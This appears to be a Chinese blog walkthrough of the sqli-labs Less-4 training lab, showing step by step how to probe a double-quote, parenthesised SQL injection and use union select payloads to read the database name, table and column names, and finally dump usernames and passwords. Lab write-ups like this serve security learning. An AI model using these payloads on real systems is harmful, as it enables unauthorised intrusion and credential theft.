【网络安全】sqli-labs Less-4 解题详析

原创已于 2025-09-14 08:39:06 修改 · 3.5k 阅读

2 ·

CC 4.0 BY-SA版权

原创文章，禁止转载，否则保留追究法律责任的权利。

文章标签：

#web安全 #数据库 #sql

于 2023-05-02 09:37:12 首次发布

Sqli-Labs靶场攻防实战专栏收录该内容

28 篇文章

订阅专栏

文章详细介绍了如何识别和利用GET型双引号字符型SQL注入漏洞，包括判断注入类型、确定注入点数量、查询数据库名、表名、列名以及具体字段的方法。通过示例展示了查询过程，并提及后续将探讨Less-5的相关内容。

文章目录

Less-4 GET - Error based - Double quotes - String:基于错误的GET双引号字符型注入

判断注入类型

GET1" and "1"="1，回显如下：
在这里插入图片描述
GET1" and "1"="2
没有回显，说明该漏洞类型为GET型双引号字符型注入

判断注入点个数

GET1" order by 3 --+
在这里插入图片描述

由上图可知，sql语法中给$id加上了()
猜测后端语句为SELECT * FROM xx where id=("$id")
故构造GET1'） order by 3 --+，此时后端语句为SELECT * FROM xx where id=("1") order by 3 --+")
即SELECT * FROM xx where id=("-1") order by 3

GET1") order by 3 --+

在这里插入图片描述 GET1") order by 4 --+
故注入点为3个

查库名

GET-1") union select 1,2,database(); --+
回显库名security
在这里插入图片描述

查表名

-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

回显四个表名

在这里插入图片描述

查users表的列名

-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

Payload：-1") union select 1,group_concat(username),group_concat(password) from 库名.表名; --+
实例如下：

-1") union select 1,group_concat(username),group_concat(password) from security.users; --+

在这里插入图片描述

总结

以上为【网络安全】sqli-labs Less-4 解题详析，后续将分享【网络安全】sqli-labs Less-5 解题详析。

原理及姿势可参考：【网络安全】SQL注入原理及常见攻击方法简析